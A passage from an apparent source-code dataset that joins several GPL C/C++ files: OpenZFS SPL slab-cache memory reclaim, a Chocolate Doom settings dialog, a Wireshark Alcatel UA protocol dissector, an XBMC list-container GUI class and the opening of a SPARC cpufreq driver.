		kmem_cache_free(skc->skc_linux_cache, obj);
		goto out;
	}

	/*
	 * While a cache has outstanding emergency objects all freed objects
	 * must be checked. However, since emergency objects will never use
	 * a virtual address these objects can be safely excluded as an
	 * optimization.
	 */
	if (!is_vmalloc_addr(obj)) {
		spin_lock(&skc->skc_lock);
		do_emergency = (skc->skc_obj_emergency > 0);
		spin_unlock(&skc->skc_lock);

		if (do_emergency && (spl_emergency_free(skc, obj) == 0))
			goto out;
	}

	local_irq_save(flags);

	/*
	 * Safe to update per-cpu structure without lock, but
	 * no remote memory allocation tracking is being performed
	 * it is entirely possible to allocate an object from one
	 * CPU cache and return it to another.
	 */
	skm = skc->skc_mag[smp_processor_id()];
	ASSERT(skm->skm_magic == SKM_MAGIC);

	/*
	 * Per-CPU cache full, flush it to make space for this object,
	 * this may result in an empty slab which can be reclaimed once
	 * interrupts are re-enabled.
	 */
	if (unlikely(skm->skm_avail >= skm->skm_size)) {
		spl_cache_flush(skc, skm, skm->skm_refill);
		do_reclaim = 1;
	}

	/* Available space in cache, use it */
	skm->skm_objs[skm->skm_avail++] = obj;

	local_irq_restore(flags);

	if (do_reclaim)
		spl_slab_reclaim(skc);
out:
	atomic_dec(&skc->skc_ref);
}
EXPORT_SYMBOL(spl_kmem_cache_free);
/*
* The generic shrinker function for all caches. Under Linux a shrinker
* may not be tightly coupled with a slab cache. In fact Linux always
* systematically tries calling all registered shrinker callbacks which
* report that they contain unused objects. Because of this we only
* register one shrinker function in the shim layer for all slab caches.
* We always attempt to shrink all caches when this generic shrinker
* is called.
*
* If sc->nr_to_scan is zero, the caller is requesting a query of the
* number of objects which can potentially be freed. If it is nonzero,
* the request is to free that many objects.
*
* Linux kernels >= 3.12 have the count_objects and scan_objects callbacks
* in struct shrinker and also require the shrinker to return the number
* of objects freed.
*
* Older kernels require the shrinker to return the number of freeable
* objects following the freeing of nr_to_free.
*
* Linux semantics differ from those under Solaris, which are to
* free all available objects which may (and probably will) be more
* objects than the requested nr_to_scan.
*/
static spl_shrinker_t
__spl_kmem_cache_generic_shrinker(struct shrinker *shrink,
    struct shrink_control *sc)
{
	spl_kmem_cache_t *skc;
	int alloc = 0;

	/*
	 * No shrinking in a transaction context. Can cause deadlocks.
	 */
	if (sc->nr_to_scan && spl_fstrans_check())
		return (SHRINK_STOP);

	down_read(&spl_kmem_cache_sem);
	list_for_each_entry(skc, &spl_kmem_cache_list, skc_list) {
		if (sc->nr_to_scan) {
#ifdef HAVE_SPLIT_SHRINKER_CALLBACK
			/* Newer kernels expect the number of objects freed. */
			uint64_t oldalloc = skc->skc_obj_alloc;
			spl_kmem_cache_reap_now(skc,
			    MAX(sc->nr_to_scan>>fls64(skc->skc_slab_objs), 1));
			if (oldalloc > skc->skc_obj_alloc)
				alloc += oldalloc - skc->skc_obj_alloc;
#else
			/* Older kernels expect the remaining freeable count. */
			spl_kmem_cache_reap_now(skc,
			    MAX(sc->nr_to_scan>>fls64(skc->skc_slab_objs), 1));
			alloc += skc->skc_obj_alloc;
#endif /* HAVE_SPLIT_SHRINKER_CALLBACK */
		} else {
			/* Request to query number of freeable objects */
			alloc += skc->skc_obj_alloc;
		}
	}
	up_read(&spl_kmem_cache_sem);

	/*
	 * When KMC_RECLAIM_ONCE is set allow only a single reclaim pass.
	 * This functionality only exists to work around a rare issue where
	 * shrink_slabs() is repeatedly invoked by many cores causing the
	 * system to thrash.
	 */
	if ((spl_kmem_cache_reclaim & KMC_RECLAIM_ONCE) && sc->nr_to_scan)
		return (SHRINK_STOP);

	return (MAX(alloc, 0));
}
SPL_SHRINKER_CALLBACK_WRAPPER(spl_kmem_cache_generic_shrinker);
/*
* Call the registered reclaim function for a cache. Depending on how
* many and which objects are released it may simply repopulate the
* local magazine which will then need to age-out. Objects which cannot
* fit in the magazine we will be released back to their slabs which will
* also need to age out before being release. This is all just best
* effort and we do not want to thrash creating and destroying slabs.
*/
void
spl_kmem_cache_reap_now(spl_kmem_cache_t *skc, int count)
{
	ASSERT(skc->skc_magic == SKC_MAGIC);
	ASSERT(!test_bit(KMC_BIT_DESTROY, &skc->skc_flags));

	/* Hold a reference so the cache cannot be destroyed mid-reap. */
	atomic_inc(&skc->skc_ref);

	/*
	 * Execute the registered reclaim callback if it exists. The
	 * per-cpu caches will be drained when KMC_EXPIRE_MEM is set.
	 */
	if (skc->skc_flags & KMC_SLAB) {
		if (skc->skc_reclaim)
			skc->skc_reclaim(skc->skc_private);

		if (spl_kmem_cache_expire & KMC_EXPIRE_MEM)
			kmem_cache_shrink(skc->skc_linux_cache);

		goto out;
	}

	/*
	 * Prevent concurrent cache reaping when contended.
	 */
	if (test_and_set_bit(KMC_BIT_REAPING, &skc->skc_flags))
		goto out;

	/*
	 * When a reclaim function is available it may be invoked repeatedly
	 * until at least a single slab can be freed. This ensures that we
	 * do free memory back to the system. This helps minimize the chance
	 * of an OOM event when the bulk of memory is used by the slab.
	 *
	 * When free slabs are already available the reclaim callback will be
	 * skipped. Additionally, if no forward progress is detected despite
	 * a reclaim function the cache will be skipped to avoid deadlock.
	 *
	 * Longer term this would be the correct place to add the code which
	 * repacks the slabs in order minimize fragmentation.
	 */
	if (skc->skc_reclaim) {
		uint64_t objects = UINT64_MAX;
		int do_reclaim;

		do {
			spin_lock(&skc->skc_lock);
			/*
			 * Reclaim again only while forward progress is
			 * made: slabs exist, none are free, and the number
			 * of allocated objects decreased last pass.
			 */
			do_reclaim =
			    (skc->skc_slab_total > 0) &&
			    ((skc->skc_slab_total-skc->skc_slab_alloc) == 0) &&
			    (skc->skc_obj_alloc < objects);

			objects = skc->skc_obj_alloc;
			spin_unlock(&skc->skc_lock);

			if (do_reclaim)
				skc->skc_reclaim(skc->skc_private);

		} while (do_reclaim);
	}

	/* Reclaim from the magazine and free all now empty slabs. */
	if (spl_kmem_cache_expire & KMC_EXPIRE_MEM) {
		spl_kmem_magazine_t *skm;
		unsigned long irq_flags;

		local_irq_save(irq_flags);
		skm = skc->skc_mag[smp_processor_id()];
		spl_cache_flush(skc, skm, skm->skm_avail);
		local_irq_restore(irq_flags);
	}

	spl_slab_reclaim(skc);

	/* Release the REAPING bit and wake anyone waiting on it. */
	clear_bit_unlock(KMC_BIT_REAPING, &skc->skc_flags);
	smp_mb__after_atomic();
	wake_up_bit(&skc->skc_flags, KMC_BIT_REAPING);
out:
	atomic_dec(&skc->skc_ref);
}
EXPORT_SYMBOL(spl_kmem_cache_reap_now);
/*
* Reap all free slabs from all registered caches.
*/
void
spl_kmem_reap(void)
{
struct shrink_control sc;
sc.nr_to_scan = KMC_REAP_CHUNK;
sc.gfp_mask = GFP_KERNEL;
(void) __spl_kmem_cache_generic_shrinker(NULL, &sc);
}
EXPORT_SYMBOL(spl_kmem_reap);
int
spl_kmem_cache_init(void)
{
	/* Protects and anchors the global list of registered caches. */
	init_rwsem(&spl_kmem_cache_sem);
	INIT_LIST_HEAD(&spl_kmem_cache_list);

	/* Shared taskq used for cache aging and asynchronous slab growth. */
	spl_kmem_cache_taskq = taskq_create("spl_kmem_cache",
	    spl_kmem_cache_kmem_threads, maxclsyspri, 1, 32, TASKQ_PREPOPULATE);

	/*
	 * NOTE(review): the taskq_create() result is not checked here --
	 * confirm a NULL taskq is tolerated by the dispatch paths.
	 */
	spl_register_shrinker(&spl_kmem_cache_shrinker);

	return (0);
}
void
spl_kmem_cache_fini(void)
{
	/* Tear down in reverse order of spl_kmem_cache_init(). */
	spl_unregister_shrinker(&spl_kmem_cache_shrinker);
	taskq_destroy(spl_kmem_cache_taskq);
}
| gpl-2.0 |
Slipyx/Mint-Doom | src/setup/compatibility.c | 2 | 1442 | // Emacs style mode select -*- C++ -*-
//-----------------------------------------------------------------------------
//
// Copyright(C) 2006 Simon Howard
//
// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software
// Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
// 02111-1307, USA.
//
// Compatibility settings menu
#include <stdlib.h>
#include "textscreen.h"
#include "compatibility.h"
int vanilla_savegame_limit = 1;
int vanilla_demo_limit = 1;
// Build and display the "Compatibility" dialog, with one checkbox
// bound to each vanilla-compatibility option.
void CompatibilitySettings(void)
{
    txt_window_t *dialog;

    dialog = TXT_NewWindow("Compatibility");

    TXT_AddWidgets(dialog,
                   TXT_NewCheckBox("Vanilla savegame limit",
                                   &vanilla_savegame_limit),
                   TXT_NewCheckBox("Vanilla demo limit",
                                   &vanilla_demo_limit),
                   NULL);
}
| gpl-2.0 |
arowser/wireshark-xcoin | epan/dissectors/packet-ua.c | 2 | 9053 | /* packet-ua.c
* Routines for UA/UDP (Universal Alcatel over UDP) packet dissection.
* Copyright 2012, Alcatel-Lucent Enterprise <lars.ruoff@alcatel-lucent.com>
*
* $Id$
*
* Wireshark - Network traffic analyzer
* By Gerald Combs <gerald@wireshark.org>
* Copyright 1998 Gerald Combs
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#include "config.h"
#include <glib.h>
#include "epan/packet.h"
#include "epan/prefs.h"
#include "epan/dissectors/packet-rtp.h"
#include "epan/dissectors/packet-rtcp.h"
#include "packet-uaudp.h"
void proto_register_ua_msg(void);
void proto_reg_handoff_ua_msg(void);
/*-----------------------------------------------------------------------------
GLOBALS
---------------------------------------------------------------------------*/
#if 0
static dissector_table_t ua_opcode_dissector_table;
#endif
static int proto_ua_msg = -1;
static gint ett_ua_msg = -1;
static gboolean setup_conversations_enabled = TRUE;
static dissector_handle_t noe_handle;
static dissector_handle_t ua3g_handle;
/* Dispatch one UA message to the appropriate sub-dissector.
 *
 * direction: SYS_TO_TERM or TERM_TO_SYS, forwarded to the ua3g dissector.
 * tree/pinfo/tvb: standard dissection context.
 * offset: start of the message (the 2-byte little-endian length header).
 * opcode: the opcode byte, already read at offset+2 by the caller.
 * length: total message length including the 2-byte length header.
 */
static void uadecode(e_ua_direction direction,
                     proto_tree    *tree,
                     packet_info   *pinfo,
                     tvbuff_t      *tvb,
                     gint           offset,
                     gint           opcode,
                     gint           length)
{
    switch (opcode & 0x7f) /* suppression of the CP bit */
    {
    case 0x15:
    case 0x16:
        {
            /* NOE (Alcatel terminal) messages */
            call_dissector(noe_handle,
                           tvb_new_subset(tvb, offset, length, length),
                           pinfo,
                           tree);
            break;
        }
    case 0x00:
    case 0x01:
    case 0x02:
    case 0x03:
    case 0x04:
    case 0x05:
    case 0x06:
    case 0x07:  /* Only UA NOE */
    case 0x08:  /* Only UA NOE */
    case 0x09:
    case 0x0A:
    case 0x0B:
    case 0x0C:
    case 0x0D:
    case 0x0E:
    case 0x0F:
    case 0x11:
    case 0x12:
    case 0x13:
    case 0x14:
    case 0x17:
    case 0x18:
    case 0x1F:  /* case 0x9F */
    case 0x20:
    case 0x21:
    case 0x22:
    case 0x23:
    case 0x24:  /* Only IP NOE */
    case 0x25:  /* Only IP NOE */
    case 0x26:
    case 0x27:
    case 0x28:
    case 0x29:
    case 0x2A:
    case 0x2B:  /* Only UA NOE */
    case 0x2C:
    case 0x2D:
    case 0x2E:
    case 0x30:
    case 0x31:
    case 0x32:  /* Only UA NOE */
    case 0x33:
    case 0x35:
    case 0x36:  /* IP Phone */
    case 0x38:
    case 0x39:
    case 0x3A:
    case 0x3B:
    case 0x3C:
    case 0x3D:
    case 0x3E:
    case 0x3F:
    case 0x40:
    case 0x41:
    case 0x42:
    case 0x43:
    case 0x44:
    case 0x45:
    case 0x46:
    case 0x47:
    case 0x48:
    case 0x49:
    case 0x4A:
    case 0x4B:
    case 0x4C:
    case 0x4D:
    case 0x4E:
    case 0x4F:
    case 0x50:  /* Only UA NOE */
        {
            /* UA3G signalling messages; direction is passed as dissector data */
            call_dissector_with_data(ua3g_handle,
                                     tvb_new_subset(tvb, offset, length, length),
                                     pinfo,
                                     tree, &direction);
            break;
        }
    default:
        {
            /* add text to the frame "INFO" column */
            col_append_str(pinfo->cinfo, COL_INFO, " - UA3G Message ERR: Opcode Unknown");
            /* Use the opcode the caller already read at offset+2 instead of
               re-reading the same byte from the tvb. */
            proto_tree_add_text(tree,
                                tvb,
                                offset,
                                length,
                                "Opcode Unknown 0x%02x",
                                opcode);
            break;
        }
    }
}
/*-----------------------------------------------------------------------------
UA DISSECTOR
---------------------------------------------------------------------------*/
/* Dissect a sequence of UA messages contained in tvb.
 *
 * Each message is: 2-byte little-endian payload length, 1-byte opcode,
 * payload.  direction selects the protocol-tree label and is forwarded
 * to the per-message decoder.  For "StartRTP" messages (opcode 0x13,
 * sub-type 0x01) the remote RTP endpoint is parsed out of the TLV list
 * and registered with the RTP/RTCP dissectors so the media stream is
 * decoded, when the preference allows it. */
static void _dissect_ua_msg(tvbuff_t *tvb,
                            packet_info *pinfo,
                            proto_tree *tree,
                            e_ua_direction direction)
{
    gint offset = 0;
    proto_item *ua_msg_item;
    proto_tree *ua_msg_tree;

    ua_msg_item = proto_tree_add_protocol_format(tree, proto_ua_msg, tvb, 0, -1,
        "Universal Alcatel Protocol, %s",
        ((direction == SYS_TO_TERM) ?
         "System -> Terminal" : "Terminal -> System"));

    ua_msg_tree = proto_item_add_subtree(ua_msg_item, ett_ua_msg);

    /* Walk every message in the buffer. */
    while (tvb_offset_exists(tvb, offset))
    {
        gint length;
        gint opcode;

        /* Total length = 2-byte header + payload length field. */
        length = tvb_get_letohs(tvb, offset) + 2;
        opcode = tvb_get_guint8(tvb, offset+2);

        /* RTP/RTCP conversation setup */
        if (setup_conversations_enabled && (opcode==0x13) && (tvb_get_guint8(tvb, offset+3)==0x01))
        {
            address remote_rtp_addr;
            guint32 remote_rtp_port;
            gint suboffset;

            remote_rtp_addr.data = NULL;
            remote_rtp_port = 0;

            /* StartRTP: scan the TLV list (1-byte tag, 1-byte length, value)
               for the remote IP (tag 0x01) and remote port (tag 0x02). */
            suboffset = offset + 5;
            while (suboffset < offset+length)
            {
                switch (tvb_get_guint8(tvb, suboffset))
                {
                case 0x00: /* local port */
                    {
                        /*local_rtp_port = tvb_get_ntohs(tvb, suboffset+2);*/
                        break;
                    }
                case 0x01: /* remote IP */
                    {
                        remote_rtp_addr.type = AT_IPv4;
                        remote_rtp_addr.len = 4;
                        remote_rtp_addr.data = tvb_get_ptr(tvb, suboffset+2, 4);
                        break;
                    }
                case 0x02: /* remote port */
                    {
                        remote_rtp_port = tvb_get_ntohs(tvb, suboffset+2);
                        break;
                    }
                }
                suboffset += tvb_get_guint8(tvb, suboffset+1) + 2;
            }

            /* Register RTP on the found port and RTCP on port+1. */
            if ((remote_rtp_addr.data != NULL) && (remote_rtp_port != 0))
            {
                rtp_add_address(pinfo, &remote_rtp_addr, remote_rtp_port, 0,
                                "UA", pinfo->fd->num, 0, NULL);
                rtcp_add_address(pinfo, &remote_rtp_addr, remote_rtp_port+1, 0,
                                 "UA", pinfo->fd->num);
            }
        }

        uadecode(direction, ua_msg_tree, pinfo, tvb, offset, opcode, length);

        offset += length;
    }
}
/* Entry point for UA traffic flowing from the call server to the terminal. */
static void dissect_ua_sys_to_term(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree)
{
    _dissect_ua_msg(tvb, pinfo, tree, SYS_TO_TERM);
}
/* Entry point for UA traffic flowing from the terminal to the call server. */
static void dissect_ua_term_to_sys(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree)
{
    _dissect_ua_msg(tvb, pinfo, tree, TERM_TO_SYS);
}
/*-----------------------------------------------------------------------------
DISSECTORS REGISTRATION FUNCTIONS
---------------------------------------------------------------------------*/
/* Register the UA protocol, its two directional dissectors, the subtree
   array, and the "setup_conversations" boolean preference. */
void proto_register_ua_msg(void)
{
    module_t *ua_msg_module;

    static gint *ett[] =
    {
        &ett_ua_msg,
    };

    /* UA dissector registration */
    proto_ua_msg = proto_register_protocol("Universal Alcatel Protocol", "UA", "ua");
    /* One named dissector per direction so UAUDP can hook the right one. */
    register_dissector("ua_sys_to_term", dissect_ua_sys_to_term, proto_ua_msg);
    register_dissector("ua_term_to_sys", dissect_ua_term_to_sys, proto_ua_msg);

    /* Common subtree array registration */
    proto_register_subtree_array(ett, array_length(ett));

    /* Register preferences */
    ua_msg_module = prefs_register_protocol(proto_ua_msg, NULL);

    prefs_register_bool_preference(ua_msg_module, "setup_conversations",
        "Setup RTP/RTCP conversations on Start RTP",
        "Setup RTP/RTCP conversations when parsing Start RTP messages",
        &setup_conversations_enabled);
}
/* Handoff: resolve the NOE and UA3G sub-dissector handles that uadecode()
   dispatches to.  The #if 0 section is a sketched (disabled) registration
   of UA on top of UAUDP plus an opcode-based dissector table. */
void proto_reg_handoff_ua_msg(void)
{
#if 0 /* Future */
    dissector_handle_t handle_ua_msg;

    /* hooking of UA on UAUDP */
    /* XXX: The following is NG since the same 'pattern' is added twice */
    handle_ua_msg = find_dissector("ua_sys_to_term");
    dissector_add_uint("uaudp.opcode", UAUDP_DATA, handle_ua_msg);
    handle_ua_msg = find_dissector("ua_term_to_sys");
    dissector_add_uint("uaudp.opcode", UAUDP_DATA, handle_ua_msg);

    /* For hooking dissectors to UA */
    ua_opcode_dissector_table =
        register_dissector_table("ua.opcode",
                                 "ua.opcode",
                                 FT_UINT8,
                                 BASE_HEX);
#endif

    noe_handle  = find_dissector("noe");
    ua3g_handle = find_dissector("ua3g");
}
| gpl-2.0 |
bkury/OpenPHT | xbmc/guilib/GUIListContainer.cpp | 2 | 9302 | /*
* Copyright (C) 2005-2012 Team XBMC
* http://www.xbmc.org
*
* This Program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This Program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with XBMC; see the file COPYING. If not, see
* <http://www.gnu.org/licenses/>.
*
*/
#include "system.h"
#include "GUIListContainer.h"
#include "GUIListItem.h"
#include "Key.h"
// Standard constructor: forwards geometry/scrolling parameters to the base
// container and marks this control as a simple list view.
CGUIListContainer::CGUIListContainer(int parentID, int controlID, float posX, float posY, float width, float height, ORIENTATION orientation, const CScroller& scroller, int preloadItems)
    : CGUIBaseContainer(parentID, controlID, posX, posY, width, height, orientation, scroller, preloadItems)
{
  ControlType = GUICONTAINER_LIST;
  m_type = VIEW_TYPE_LIST;
}
// No list-specific cleanup is required.
CGUIListContainer::~CGUIListContainer(void)
{
}
// Handle paging and analog scrolling actions; everything else is delegated
// to the base container.
bool CGUIListContainer::OnAction(const CAction &action)
{
  switch (action.GetID())
  {
  case ACTION_PAGE_UP:
    {
      if (GetOffset() == 0)
      { // already on the first page, so move to the first item
        SetCursor(0);
      }
      else
      { // scroll up to the previous page
        Scroll( -m_itemsPerPage);
      }
      return true;
    }
    break;
  case ACTION_PAGE_DOWN:
    {
      if (GetOffset() == (int)m_items.size() - m_itemsPerPage || (int)m_items.size() < m_itemsPerPage)
      { // already at the last page, so move to the last item.
        SetCursor(m_items.size() - GetOffset() - 1);
      }
      else
      { // scroll down to the next page
        Scroll(m_itemsPerPage);
      }
      return true;
    }
    break;
    // smooth scrolling (for analog controls)
  case ACTION_SCROLL_UP:
    {
      // Accumulate the squared analog amount; each 0.4 of accumulated
      // "energy" moves one step, so a stronger deflection scrolls faster.
      m_analogScrollCount += action.GetAmount() * action.GetAmount();
      bool handled = false;
      while (m_analogScrollCount > 0.4)
      {
        handled = true;
        m_analogScrollCount -= 0.4f;
        // Scroll the view while the cursor is in the upper half of the
        // page, otherwise just move the cursor.
        if (GetOffset() > 0 && GetCursor() <= m_itemsPerPage / 2)
        {
          Scroll(-1);
        }
        else if (GetCursor() > 0)
        {
          SetCursor(GetCursor() - 1);
        }
      }
      return handled;
    }
    break;
  case ACTION_SCROLL_DOWN:
    {
      m_analogScrollCount += action.GetAmount() * action.GetAmount();
      bool handled = false;
      while (m_analogScrollCount > 0.4)
      {
        handled = true;
        m_analogScrollCount -= 0.4f;
        // Mirror of SCROLL_UP: scroll while the cursor sits in the lower
        // half of the page, otherwise advance the cursor.
        if (GetOffset() + m_itemsPerPage < (int)m_items.size() && GetCursor() >= m_itemsPerPage / 2)
        {
          Scroll(1);
        }
        else if (GetCursor() < m_itemsPerPage - 1 && GetOffset() + GetCursor() < (int)m_items.size() - 1)
        {
          SetCursor(GetCursor() + 1);
        }
      }
      return handled;
    }
    break;
  }
  return CGUIBaseContainer::OnAction(action);
}
// A label-reset message addressed to this control rewinds the view to the
// very top before the base class processes the message.
bool CGUIListContainer::OnMessage(CGUIMessage& message)
{
  const bool forThisControl = (message.GetControlId() == GetID());
  if (forThisControl && message.GetMessage() == GUI_MSG_LABEL_RESET)
  {
    SetCursor(0);
    SetOffset(0);
    m_scroller.SetValue(0);
  }
  return CGUIBaseContainer::OnMessage(message);
}
// Move the selection one item up.  Prefers moving the cursor within the
// page, then scrolling the page, then (optionally) wrapping to the end.
// Returns false only when at the top and wrapping is disabled.
bool CGUIListContainer::MoveUp(bool wrapAround)
{
  if (GetCursor() > 0)
  {
    SetCursor(GetCursor() - 1);
  }
  else if (GetCursor() == 0 && GetOffset())
  {
    ScrollToOffset(GetOffset() - 1);
  }
  else if (wrapAround)
  {
    if (!m_items.empty())
    { // wrap to the last item in the list, and set our container moving up
      int offset = m_items.size() - m_itemsPerPage;
      if (offset < 0) offset = 0;
      SetCursor(m_items.size() - offset - 1);
      ScrollToOffset(offset);
      SetContainerMoving(-1);
    }
  }
  else
    return false;
  return true;
}
// Move the selection one item down: cursor first, then page scroll, then
// (optionally) wrap back to the first item.  Returns false only when at the
// bottom and wrapping is disabled.
bool CGUIListContainer::MoveDown(bool wrapAround)
{
  if (GetOffset() + GetCursor() + 1 < (int)m_items.size())
  {
    if (GetCursor() + 1 < m_itemsPerPage)
    {
      SetCursor(GetCursor() + 1);
    }
    else
    {
      ScrollToOffset(GetOffset() + 1);
    }
  }
  else if(wrapAround)
  { // move first item in list, and set our container moving in the "down" direction
    SetCursor(0);
    ScrollToOffset(0);
    SetContainerMoving(1);
  }
  else
    return false;
  return true;
}
// scrolls the said amount
void CGUIListContainer::Scroll(int amount)
{
// increase or decrease the offset
int offset = GetOffset() + amount;
if (offset > (int)m_items.size() - m_itemsPerPage)
{
offset = m_items.size() - m_itemsPerPage;
}
if (offset < 0) offset = 0;
ScrollToOffset(offset);
}
// Clamp the current offset (and the scroller position) into the valid
// range reported by GetOffsetRange().
void CGUIListContainer::ValidateOffset()
{
  if (!m_layout) return;
  // first thing is we check the range of our offset
  // don't validate offset if we are scrolling in case the tween image exceed <0, 1> range
  int minOffset, maxOffset;
  GetOffsetRange(minOffset, maxOffset);
  if (GetOffset() > maxOffset || (!m_scroller.IsScrolling() && m_scroller.GetValue() > maxOffset * m_layout->Size(m_orientation)))
  {
    SetOffset(std::max(0, maxOffset));
    m_scroller.SetValue(GetOffset() * m_layout->Size(m_orientation));
  }
  if (GetOffset() < 0 || (!m_scroller.IsScrolling() && m_scroller.GetValue() < 0))
  {
    SetOffset(0);
    m_scroller.SetValue(0);
  }
}
// Clamp the requested cursor to the visible page (upper bound first, then
// lower bound, preserving the original clamping order) and record the move
// direction unless the container was just reset.
void CGUIListContainer::SetCursor(int cursor)
{
  int clamped = (cursor > m_itemsPerPage - 1) ? m_itemsPerPage - 1 : cursor;
  clamped = (clamped < 0) ? 0 : clamped;
  if (!m_wasReset)
    SetContainerMoving(clamped - GetCursor());
  CGUIBaseContainer::SetCursor(clamped);
}
// Select the given absolute item index, scrolling the page as needed so the
// item becomes visible (first-of-page when coming from below, last-of-page
// when coming from above).  Out-of-range indices are ignored.
void CGUIListContainer::SelectItem(int item)
{
  // Check that our offset is valid
  ValidateOffset();
  // only select an item if it's in a valid range
  if (item >= 0 && item < (int)m_items.size())
  {
    // Select the item requested
    if (item >= GetOffset() && item < GetOffset() + m_itemsPerPage)
    { // the item is on the current page, so don't change it.
      SetCursor(item - GetOffset());
    }
    else if (item < GetOffset())
    { // item is on a previous page - make it the first item on the page
      SetCursor(0);
      ScrollToOffset(item);
    }
    else // (item >= GetOffset()+m_itemsPerPage)
    { // item is on a later page - make it the last item on the page
      SetCursor(m_itemsPerPage - 1);
      ScrollToOffset(item - GetCursor());
    }
  }
}
// Map a point (in container coordinates) to the row it falls on, walking
// item layouts along the scroll axis.  Returns the row index and optionally
// the point translated into that item's local coordinates, or -1 when the
// point hits no item.
int CGUIListContainer::GetCursorFromPoint(const CPoint &point, CPoint *itemPoint) const
{
  if (!m_focusedLayout || !m_layout)
    return -1;
  int row = 0;
  float pos = (m_orientation == VERTICAL) ? point.y : point.x;
  while (row < m_itemsPerPage + 1) // 1 more to ensure we get the (possible) half item at the end.
  {
    // The focused row may use a different (larger) layout than the rest.
    const CGUIListItemLayout *layout = (row == GetCursor()) ? m_focusedLayout : m_layout;
    if (pos < layout->Size(m_orientation) && row + GetOffset() < (int)m_items.size())
    { // found correct "row" -> check horizontal
      if (!InsideLayout(layout, point))
        return -1;
      if (itemPoint)
        *itemPoint = m_orientation == VERTICAL ? CPoint(point.x, pos) : CPoint(pos, point.y);
      return row;
    }
    row++;
    pos -= layout->Size(m_orientation);
  }
  return -1;
}
bool CGUIListContainer::SelectItemFromPoint(const CPoint &point)
{
CPoint itemPoint;
int row = GetCursorFromPoint(point, &itemPoint);
if (row < 0)
return false;
SetCursor(row);
CGUIListItemLayout *focusedLayout = GetFocusedLayout();
if (focusedLayout)
focusedLayout->SelectItemFromPoint(itemPoint);
return true;
}
//#ifdef PRE_SKIN_VERSION_9_10_COMPATIBILITY
// Legacy (pre-skin-9.10) constructor: synthesizes normal and focused item
// layouts from the old-style label/texture parameters, and snaps the
// container height to a whole number of rows.
CGUIListContainer::CGUIListContainer(int parentID, int controlID, float posX, float posY, float width, float height,
                                     const CLabelInfo& labelInfo, const CLabelInfo& labelInfo2,
                                     const CTextureInfo& textureButton, const CTextureInfo& textureButtonFocus,
                                     float textureHeight, float itemWidth, float itemHeight, float spaceBetweenItems)
    : CGUIBaseContainer(parentID, controlID, posX, posY, width, height, VERTICAL, 200, 0)
{
  CGUIListItemLayout layout;
  layout.CreateListControlLayouts(width, textureHeight + spaceBetweenItems, false, labelInfo, labelInfo2, textureButton, textureButtonFocus, textureHeight, itemWidth, itemHeight, "", "");
  m_layouts.push_back(layout);
  // The focused layout is gated on this control having focus.
  CStdString condition;
  condition.Format("control.hasfocus(%i)", controlID);
  CStdString condition2 = "!" + condition;
  CGUIListItemLayout focusLayout;
  focusLayout.CreateListControlLayouts(width, textureHeight + spaceBetweenItems, true, labelInfo, labelInfo2, textureButton, textureButtonFocus, textureHeight, itemWidth, itemHeight, condition2, condition);
  m_focusedLayouts.push_back(focusLayout);
  // Round the height down to an integral number of rows.
  m_height = floor(m_height / (textureHeight + spaceBetweenItems)) * (textureHeight + spaceBetweenItems);
  ControlType = GUICONTAINER_LIST;
}
// True when the list holds at least one full page and the view is not
// already positioned on the last page.
bool CGUIListContainer::HasNextPage() const
{
  const int itemCount = (int)m_items.size();
  if (itemCount < m_itemsPerPage)
    return false;
  return GetOffset() != itemCount - m_itemsPerPage;
}
// True when the view has been scrolled past the very first item.
bool CGUIListContainer::HasPreviousPage() const
{
  return GetOffset() > 0;
}
| gpl-2.0 |
punitvara/linux-1 | drivers/cpufreq/sparc-us3-cpufreq.c | 1794 | 5313 | /* us3_cpufreq.c: UltraSPARC-III cpu frequency support
*
* Copyright (C) 2003 David S. Miller (davem@redhat.com)
*
* Many thanks to Dominik Brodowski for fixing up the cpufreq
* infrastructure in order to make this driver easier to implement.
*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/smp.h>
#include <linux/cpufreq.h>
#include <linux/threads.h>
#include <linux/slab.h>
#include <linux/init.h>
#include <asm/head.h>
#include <asm/timer.h>
static struct cpufreq_driver *cpufreq_us3_driver;
struct us3_freq_percpu_info {
struct cpufreq_frequency_table table[4];
};
/* Indexed by cpu number. */
static struct us3_freq_percpu_info *us3_freq_table;
/* UltraSPARC-III has three dividers: 1, 2, and 32. These are controlled
* in the Safari config register.
*/
#define SAFARI_CFG_DIV_1 0x0000000000000000UL
#define SAFARI_CFG_DIV_2 0x0000000040000000UL
#define SAFARI_CFG_DIV_32 0x0000000080000000UL
#define SAFARI_CFG_DIV_MASK 0x00000000C0000000UL
/* Read the Safari configuration register via an alternate-space load
 * from ASI_SAFARI_CONFIG (address %g0).
 */
static unsigned long read_safari_cfg(void)
{
	unsigned long ret;

	__asm__ __volatile__("ldxa	[%%g0] %1, %0"
			     : "=&r" (ret)
			     : "i" (ASI_SAFARI_CONFIG));
	return ret;
}
/* Write the Safari configuration register via an alternate-space store,
 * followed by "membar #Sync" so the store completes before returning.
 */
static void write_safari_cfg(unsigned long val)
{
	__asm__ __volatile__("stxa	%0, [%%g0] %1\n\t"
			     "membar	#Sync"
			     : /* no outputs */
